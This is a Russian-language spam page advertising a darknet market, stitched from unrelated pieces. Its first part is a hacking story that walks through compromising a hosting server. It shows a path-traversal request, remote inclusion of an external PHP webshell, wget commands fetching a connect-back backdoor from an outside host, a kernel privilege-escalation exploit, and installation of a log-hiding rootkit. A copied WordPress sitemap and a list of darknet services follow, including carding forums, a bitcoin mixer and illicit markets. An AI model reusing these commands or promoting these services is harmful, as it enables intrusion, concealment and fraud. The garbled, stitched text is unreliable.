2krn at krakendarknet top
Увлекательная история взлома хостинга в подробностях 1. Поиск жертвыМы выбрали один средний сервер, имя которого умолчим, по причине хостинга на нем
крутилось довольно много популярных и влиятельных сайтов, среди которых был сайт
телеканала и крутой сайт о политике, да и много других. 2. Осмотр местностиНикаких странных портов на сервере не было открыто, все баннеры сервисов были стандартны и неуязвимы. Нужно было действовать изнутри. На счастье администратор сервера любил похвастаться, и вскоре мы обнаружили интересную страничку типа « На нашем сервере расположены сайты… ».3. ВторжениеПоковырявшись на некоторых сайтах из этого списка, был обнаружен какой-то самописный форум. Возможности SQL-инжекции и XSS мы там не нашли.
Но тут на помощь пришел старый добрый товарищ – поисковая система GooGle
:). Был выполнен такой запрос:site: “www.target.com “ AND filetype: “php”Как и ожидалось, магазин google представил нам довольно обширный список php скриптов.
Немного покликав на ссылки, уязвимый скрипт был все-таки найден.
Ссылка kraken была вида:http://www.target.com/forum/index_module.php?module=main&file=redirect.phpСомневаясь в успехе, мы смодифицировали ее к такому виду: http://www.target.com/forum/index_module.php?module= main&file=../../../../../../../../../../etc/passwd Возникла мысль, что если на сервере конфиг php не запрещает открывать ссылки из посторонних сайтов, и включена инициализация глобальных переменных, то можно произвести
php-include.Нам повезло, все было действительно так, ссылка была
изменена следующим образом:http://www.target.com/forum/index_module.php?module= main&file=http://ru24.narod.ru/cmd.php?cmd=idСам cmd.php содержал текст вида:echo "”;
system($_GET['cmd']);
echo "”;
?>Но, сервер выдал нам ошибку, указывающую, что функцию system нельзя использовать на этом сервере. Тогда cmd.php был изменен к следующему виду:echo "”;
passthru($_GET['cmd']);
echo "”;?>После этого, команда id успешно выполнилась. Мы обладали правами apache. Нужно было повышать привилегии. 4. Повышение привилегийЯдро Linux было ветки 2.4.27, которое успешно рутается эксплоитом mremap. Был быстро запущен connback
backdoor.cd /tmp;
wget –o cwb.c http://ru24.narod.ru/cwb.c;Фаервол сек даже исходящие коннекты на левые порты, поэтому пришлось менять порт в бекдоре на 80.gcc cwb.c –o cb;
./bd 68.***.***.**Все, backdoor приконнектился на нужный нам адрес. Далее был скачан и запущен
mremap:wget http://www.security.nnov.ru/files/mremap_pte.c
gcc -O3 -static -fomit-frame-pointer тор mremap_pte.c -o mremap_pte
./ mremap_pte;Но система не сдавалась. Было опробовано еще несколько подобных эксплоитов. Факты говорили о том, что админ нас просто разводит. Ведь по команде uname -a выдается SMP система, а при применении эксплоита для этой системы идет запись что это не SMP система, что есть странно и является доказательством присутствия IDS.5. Альтернативные методыТак, администратор решил посмеяться, но смеется тот, кто смеется последний
:). Он все-таки совершил большую ошибку, все каталоги и файлы пользователей были доступны группе apache, членом которой были и мы.
Был пропарсен.bash_history каталога хостинга, где было обнаружено некорректное использование команды su, после чего был найден пароль администратора root. 6. Закрепляемся в системеМы успешно подключились к SSH сервису, далее было принято решение установить руткит shv4.wget http://www.geocities.com/santumadron/shv4.tar.gz;
tar zxvf shv4.tar.gz;
cd shv4;
./setup пароль портПри коннекте на SSH либо на порт руткита вводим логин root и наш пароль.
Теперь лог-файлы наших действий не ведутся, наши процессы не светятся.
Кстати, руткит shv4 является приватным, но это наш подарок вам,
от Nitrex’a и DreAmeRz’a.Авторы: DreAmeRz и Nitrex
E-mail: [email protected]
E-mail: [email protected]
WEB: www.ru24-team.net
2krn at krakendarknet top - Кракен заказ
about XML sitemaps on sitemaps.org andGoogle's list of sitemap programs.
This file contains links to sub-sitemaps, follow them to see theactual sitemap content.URL of sub-sitemapLast modified (GMT)https://www.les5w.info/sitemap-misc.html2022-03-31 07:15https://www.les5w.info/sitemap-pt-post-2022-02.html2022-03-31 07:15https://www.les5w.info/sitemap-pt-post-2022-01.html2022-02-22 16:55https://www.les5w.info/sitemap-pt-post-2021-12.html2022-03-03 11:48https://www.les5w.info/sitemap-pt-post-2021-11.html2022-01-25 13:17https://www.les5w.info/sitemap-pt-post-2021-10.html2022-01-25 13:51https://www.les5w.info/sitemap-pt-post-2021-09.html2021-10-14 13:27https://www.les5w.info/sitemap-pt-post-2021-06.html2022-01-25 13:43https://www.les5w.info/sitemap-pt-post-2021-03.html2021-10-14 10:36https://www.les5w.info/sitemap-pt-post-2021-02.html2021-03-17 12:52https://www.les5w.info/sitemap-pt-post-2021-01.html2021-03-18 14:56https://www.les5w.info/sitemap-pt-post-2020-12.html2021-02-11 15:32https://www.les5w.info/sitemap-pt-post-2020-11.html2020-12-17 14:13https://www.les5w.info/sitemap-pt-post-2020-10.html2021-03-08 09:06https://www.les5w.info/sitemap-pt-post-2020-09.html2020-11-10 16:12https://www.les5w.info/sitemap-pt-post-2020-05.html2020-09-07 11:16https://www.les5w.info/sitemap-pt-post-2020-03.html2020-10-16 14:31https://www.les5w.info/sitemap-pt-post-2020-02.html2020-10-02 12:24https://www.les5w.info/sitemap-pt-post-2020-01.html2021-02-09 14:09https://www.les5w.info/sitemap-pt-post-2019-12.html2020-04-08 20:02https://www.les5w.info/sitemap-pt-post-2019-11.html2021-02-09 14:11https://www.les5w.info/sitemap-pt-post-2019-10.html2020-09-08 15:19https://www.les5w.info/sitemap-pt-post-2019-09.html2021-02-09 14:57https://www.les5w.info/sitemap-pt-post-2019-06.html2021-02-09 14:42https://www.les5w.info/sitemap-pt-post-2019-05.html2019-10-29 11:39https://www.les5w.info/sitemap-pt-post-2019-04.html2019-05-28 12:37https://www.les5w.info/sitemap-pt-post-2019-03.html2019-10-10 14:27https://www.les5w.info/sitemap-pt-post-2019-02.html2021-02-09 14:47https://www.les5w.info/sitemap-pt-post-2019-01.html2020-09-09 07:00https://www.les5w.info/sitemap-pt-post-2018-12.html2021-02-09 13:41https://www.les5w.info/sitemap-pt-post-2018-11.html2019-05-28 12:06https://www.les5w.info/sitemap-pt-post-2018-10.html2021-02-09 14:30https://www.les5w.info/sitemap-pt-post-2018-09.html2018-11-19 17:19https://www.les5w.info/sitemap-pt-post-2018-06.html2018-09-24 16:47https://www.les5w.info/sitemap-pt-post-2018-05.html2020-04-12 12:25https://www.les5w.info/sitemap-pt-post-2018-04.html2021-02-09 14:23https://www.les5w.info/sitemap-pt-post-2018-03.html2019-08-02 07:54https://www.les5w.info/sitemap-pt-post-2018-02.html2018-05-24 15:55https://www.les5w.info/sitemap-pt-post-2018-01.html2018-05-24 13:40https://www.les5w.info/sitemap-pt-post-2017-12.html2018-03-30 08:33https://www.les5w.info/sitemap-pt-post-2017-11.html2020-11-20 15:34https://www.les5w.info/sitemap-pt-post-2017-10.html2018-03-30 08:31https://www.les5w.info/sitemap-pt-post-2017-09.html2018-03-30 08:32https://www.les5w.info/sitemap-pt-post-2017-01.html2018-05-15 11:49https://www.les5w.info/sitemap-pt-page-2017-11.html2018-03-30 13:37https://www.les5w.info/sitemap-pt-page-2017-08.html2017-08-16 13:51https://www.les5w.info/sitemap-authors.html2022-03-31 07:15Generated with Google (XML)Sitemaps Generator Plugin for WordPress by ArneBrachhold. This XSLT template is released under the GPL andfree to use.
If you have problems with your sitemap please visit the plugin FAQ or the supportforum.
Литература. Onion - WWH club кардинг форум на русском языке verified2ebdpvms. Мы не успеваем пополнять и сортировать таблицу сайта, и поэтому мы взяли каталог с одного из ресурсов и кинули их в Excel для дальнейшей сортировки. Onion - Bitcoin Blender очередной биткоин-миксер, который перетасует ваши битки и никто не узнает, кто же отправил их вам. Onion - abfcgiuasaos гайд по установке и использованию анонимной безопасной. TLS, шифрование паролей пользователей, 100 доступность и другие плюшки. Onion/ - Dream Market европейская площадка по продаже, медикаментов, документов. Без JavaScript. При обмене киви на битки требует подтверждение номера телефона (вам позвонит робот а это не секурно! Onion - Konvert биткоин обменник. Кардинг / Хаккинг. Торрент трекеры, Библиотеки, архивы Торрент трекеры, библиотеки, архивы rutorc6mqdinc4cz. Топчик зарубежного дарквеба. Ещё есть режим приватных чат-комнат, для входа надо переслать ссылку собеседникам. Пока не забыл сразу расскажу один подозрительный для меня факт про ramp marketplace. Onion/ - Autistici/Inventati, сервисы от гражданских активистов Италии, бесполезый ресурс, если вы не итальянец, наверное. Onion - Probiv достаточно популярный форум по пробиву информации, обсуждение и совершение сделок по различным серых схемам. В платных аках получше. Onion - Anoninbox платный и качественный e-mail сервис, есть возможность писать в onion и клирнет ящики ваших собеседников scryptmaildniwm6.onion - ScryptMail есть встроенная система PGP. Сайты сети TOR, поиск в darknet, сайты Tor. Простая система заказа и обмен моментальными сообщениями с Админами (после моментальной регистрации без подтверждения данных) valhallaxmn3fydu. Поисковики Tor. Зеркало arhivach.